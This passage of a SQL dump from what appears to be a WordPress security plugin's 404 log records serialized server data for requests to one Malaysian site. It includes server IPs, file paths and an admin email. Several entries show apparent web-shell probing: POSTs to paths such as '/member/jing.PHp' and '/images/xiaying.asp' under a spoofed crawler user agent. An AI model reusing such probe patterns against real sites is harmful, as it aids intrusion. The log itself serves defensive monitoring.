.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa4RHuAgYuZ1@aLzbZgLMAAAAIc\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571688734.4989\";s:12:\"REQUEST_TIME\";s:10:\"1571688734\";}}','notice','2019-10-21 20:12:17','2019-10-21 20:12:14',34207832,36003984,'https://bintara.com.my/blog/tag/logitech-vc/',1,0,'141.8.142.64'),(28637,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:42:\"/store/?initiationactivity=initiationready\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:29:\"https://bintara.com.my/store/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:7:\"/store/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa4ZmCEiZGLZYlop40f6zgAAARE\";s:19:\"REDIRECT_SCRIPT_URI\";s:29:\"https://bintara.com.my/store/\";s:19:\"REDIRECT_SCRIPT_URL\";s:7:\"/store/\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa4ZmCEiZGLZYlop40f6zgAAARE\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:11:\"103.7.58.17\";s:11:\"REMOTE_PORT\";s:5:\"36756\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:29:\"https://bintara.com.my/store/\";s:10:\"SCRIPT_URL\";s:7:\"/store/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa4ZmCEiZGLZYlop40f6zgAAARE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571690905.0331\";s:12:\"REQUEST_TIME\";s:10:\"1571690905\";}}','notice','2019-10-21 20:48:26','2019-10-21 20:48:25',34970992,36771080,'https://bintara.com.my/store/?initiationactivity=initiationready',1,0,'103.7.58.17'),(28638,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:45:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:26:\"/store/?key=testActivation\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:8:\"identity\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:14:\"en-US,en;q=0.8\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:108:\"Mozilla/5.1 (Windows NT 6.0; WOW64) AppleWebKit/537.37 (KHTML, like Gecko) Chrome/58.0.1145.75 Safari/537.37\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:29:\"https://bintara.com.my/store/\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:7:\"/store/\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"403\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa4Z2SEiZGLZYlop40f7DgAAARU\";s:19:\"REDIRECT_SCRIPT_URI\";s:29:\"https://bintara.com.my/store/\";s:19:\"REDIRECT_SCRIPT_URL\";s:7:\"/store/\";s:15:\"REDIRECT_STATUS\";s:3:\"403\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa4Z2SEiZGLZYlop40f7DgAAARU\";s:12:\"REDIRECT_URL\";s:10:\"/403.shtml\";s:11:\"REMOTE_ADDR\";s:11:\"103.7.58.17\";s:11:\"REMOTE_PORT\";s:5:\"43696\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:29:\"https://bintara.com.my/store/\";s:10:\"SCRIPT_URL\";s:7:\"/store/\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa4Z2SEiZGLZYlop40f7DgAAARU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571690969.4061\";s:12:\"REQUEST_TIME\";s:10:\"1571690969\";}}','notice','2019-10-21 20:49:31','2019-10-21 20:49:29',34966768,36771464,'https://bintara.com.my/store/?key=testActivation',1,0,'103.7.58.17'),(28639,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:68:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/wp-xml.php\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:6:\"H2PUSH\";s:3:\"off\";s:7:\"H2_PUSH\";s:3:\"off\";s:9:\"H2_PUSHED\";s:0:\"\";s:12:\"H2_PUSHED_ON\";s:0:\"\";s:12:\"H2_STREAM_ID\";s:1:\"1\";s:13:\"H2_STREAM_TAG\";s:4:\"64-1\";s:5:\"HTTP2\";s:2:\"on\";s:5:\"HTTPS\";s:2:\"on\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:14:\"http://site.ru\";s:15:\"HTTP_USER_AGENT\";s:116:\"Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/533.4 (KHTML, like Gecko) Chrome/5.0.375.99 Safari/533.4\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_H2PUSH\";s:3:\"off\";s:16:\"REDIRECT_H2_PUSH\";s:3:\"off\";s:18:\"REDIRECT_H2_PUSHED\";s:0:\"\";s:21:\"REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:21:\"REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:22:\"REDIRECT_H2_STREAM_TAG\";s:4:\"64-1\";s:14:\"REDIRECT_HTTP2\";s:2:\"on\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:24:\"REDIRECT_REDIRECT_H2PUSH\";s:3:\"off\";s:25:\"REDIRECT_REDIRECT_H2_PUSH\";s:3:\"off\";s:27:\"REDIRECT_REDIRECT_H2_PUSHED\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_PUSHED_ON\";s:0:\"\";s:30:\"REDIRECT_REDIRECT_H2_STREAM_ID\";s:1:\"1\";s:31:\"REDIRECT_REDIRECT_H2_STREAM_TAG\";s:4:\"64-1\";s:23:\"REDIRECT_REDIRECT_HTTP2\";s:2:\"on\";s:23:\"REDIRECT_REDIRECT_HTTPS\";s:2:\"on\";s:32:\"REDIRECT_REDIRECT_REQUEST_METHOD\";s:3:\"GET\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URI\";s:33:\"https://bintara.com.my/wp-xml.php\";s:28:\"REDIRECT_REDIRECT_SCRIPT_URL\";s:11:\"/wp-xml.php\";s:29:\"REDIRECT_REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:24:\"REDIRECT_REDIRECT_STATUS\";s:3:\"404\";s:27:\"REDIRECT_REDIRECT_UNIQUE_ID\";s:27:\"Xa4ePRAAxqfYqgF3mYfTIwAAAAE\";s:19:\"REDIRECT_SCRIPT_URI\";s:33:\"https://bintara.com.my/wp-xml.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:11:\"/wp-xml.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"404\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa4ePRAAxqfYqgF3mYfTIwAAAAE\";s:12:\"REDIRECT_URL\";s:10:\"/404.shtml\";s:11:\"REMOTE_ADDR\";s:13:\"77.120.106.94\";s:11:\"REMOTE_PORT\";s:5:\"50084\";s:14:\"REQUEST_METHOD\";s:3:\"GET\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/wp-xml.php\";s:10:\"SCRIPT_URL\";s:11:\"/wp-xml.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/2.0\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:9:\"UNIQUE_ID\";s:27:\"Xa4ePRAAxqfYqgF3mYfTIwAAAAE\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571692094.0562\";s:12:\"REQUEST_TIME\";s:10:\"1571692094\";}}','notice','2019-10-21 21:08:17','2019-10-21 21:08:14',35376144,37178560,'https://bintara.com.my/wp-xml.php',1,0,'77.120.106.94'),(28640,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//member/jing.PHp\";s:14:\"CONTENT_LENGTH\";s:3:\"299\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"210.26.35.150\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"210.26.35.150\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/member/jing.PHp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/member/jing.PHp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa4rzKjZzpoQqaKQA3IwDwAAAM8\";s:12:\"REDIRECT_URL\";s:16:\"/member/jing.PHp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"65025\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/member/jing.PHp\";s:10:\"SCRIPT_URL\";s:16:\"/member/jing.PHp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa4rzKjZzpoQqaKQA3IwDwAAAM8\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571695564.8428\";s:12:\"REQUEST_TIME\";s:10:\"1571695564\";}}','notice','2019-10-21 22:06:07','2019-10-21 22:06:05',35778952,37582536,'http://bintara.com.my//member/jing.PHp',1,0,'210.26.35.150'),(28641,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:17:\"//member/jing.PHp\";s:14:\"CONTENT_LENGTH\";s:3:\"684\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"202.195.155.7\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"202.195.155.7\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:37:\"http://bintara.com.my/member/jing.PHp\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/member/jing.PHp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa4r16jZzpoQqaKQA3IwFAAAAMk\";s:12:\"REDIRECT_URL\";s:16:\"/member/jing.PHp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"65025\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:37:\"http://bintara.com.my/member/jing.PHp\";s:10:\"SCRIPT_URL\";s:16:\"/member/jing.PHp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa4r16jZzpoQqaKQA3IwFAAAAMk\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571695575.2128\";s:12:\"REQUEST_TIME\";s:10:\"1571695575\";}}','notice','2019-10-21 22:06:16','2019-10-21 22:06:15',35267920,37083368,'http://bintara.com.my//member/jing.PHp',1,0,'202.195.155.7'),(28642,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"//images/xiaying.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:13:\"202.130.33.63\";s:20:\"HTTP_X_FORWARDED_FOR\";s:13:\"202.130.33.63\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/images/xiaying.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/images/xiaying.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa4r8CEiZGLZYlop40cEigAAARI\";s:12:\"REDIRECT_URL\";s:19:\"/images/xiaying.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"49771\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/images/xiaying.asp\";s:10:\"SCRIPT_URL\";s:19:\"/images/xiaying.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa4r8CEiZGLZYlop40cEigAAARI\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1571695600.4188\";s:12:\"REQUEST_TIME\";s:10:\"1571695600\";}}','notice','2019-10-21 22:06:42','2019-10-21 22:06:40',35338904,37138992,'http://bintara.com.my//images/xiaying.asp',1,0,'202.130.33.63'),(28643,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"//images/xiaying.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:12:\"116.1.235.91\";s:20:\"HTTP_X_FORWARDED_FOR\";s:12:\"116.1.235.91\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/images/xiaying.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/images/xiaying.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa4r9iEiZGLZYlop40cEpAAAAQU\";s:12:\"REDIRECT_URL\";s:19:\"/images/xiaying.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"49771\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/images/xiaying.asp\";s:10:\"SCRIPT_URL\";s:19:\"/images/xiaying.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa4r9iEiZGLZYlop40cEpAAAAQU\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571695606.696\";s:12:\"REQUEST_TIME\";s:10:\"1571695606\";}}','notice','2019-10-21 22:06:48','2019-10-21 22:06:47',35268128,37063872,'http://bintara.com.my//images/xiaying.asp',1,0,'116.1.235.91'),(28644,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"//feedback/testp.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"816\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; Charset=UTF-8\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:11:\"HTTP_ACCEPT\";s:3:\"*/*\";s:20:\"HTTP_ACCEPT_LANGUAGE\";s:5:\"zh-cn\";s:15:\"HTTP_CONNECTION\";s:10:\"Keep-Alive\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:12:\"HTTP_REFERER\";s:25:\"http://misc.yahoo.com.cn/\";s:15:\"HTTP_USER_AGENT\";s:80:\"Mozilla/5.0 (compatible; Yahoo! Slurp China; http://misc.yahoo.com.cn/help.html)\";s:8:\"HTTP_VIA\";s:14:\"124.73.108.119\";s:20:\"HTTP_X_FORWARDED_FOR\";s:14:\"124.73.108.119\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"http://bintara.com.my/feedback/testp.asp\";s:19:\"REDIRECT_SCRIPT_URL\";s:19:\"/feedback/testp.asp\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"Xa4sTSEiZGLZYlop40cE5gAAAQo\";s:12:\"REDIRECT_URL\";s:19:\"/feedback/testp.asp\";s:11:\"REMOTE_ADDR\";s:13:\"103.115.42.42\";s:11:\"REMOTE_PORT\";s:5:\"53553\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:4:\"http\";s:15:\"SCRIPT_FILENAME\";s:50:\"/home/norfaiz/public_html/bintara.com.my/index.php\";s:11:\"SCRIPT_NAME\";s:10:\"/index.php\";s:10:\"SCRIPT_URI\";s:40:\"http://bintara.com.my/feedback/testp.asp\";s:10:\"SCRIPT_URL\";s:19:\"/feedback/testp.asp\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:2:\"80\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:9:\"UNIQUE_ID\";s:27:\"Xa4sTSEiZGLZYlop40cE5gAAAQo\";s:8:\"PHP_SELF\";s:10:\"/index.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1571695693.743\";s:12:\"REQUEST_TIME\";s:10:\"1571695693\";}}','notice','2019-10-21 22:08:15','2019-10-21 22:08:14',35339384,37137008,'http://bintara.com.my//feedback/testp.asp',1,0,'124.73.108.119'),(28645,0,'four_oh_four','found_404','a:1:{s:6:\"SERVER\";a:41:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:20:\"//feedback/testp.asp\";s:14:\"CONTENT_LENGTH\";s:3:\"681\";s:12:\"CONTENT_TYPE\";s:48:\"application/x-www-form-urlencoded; 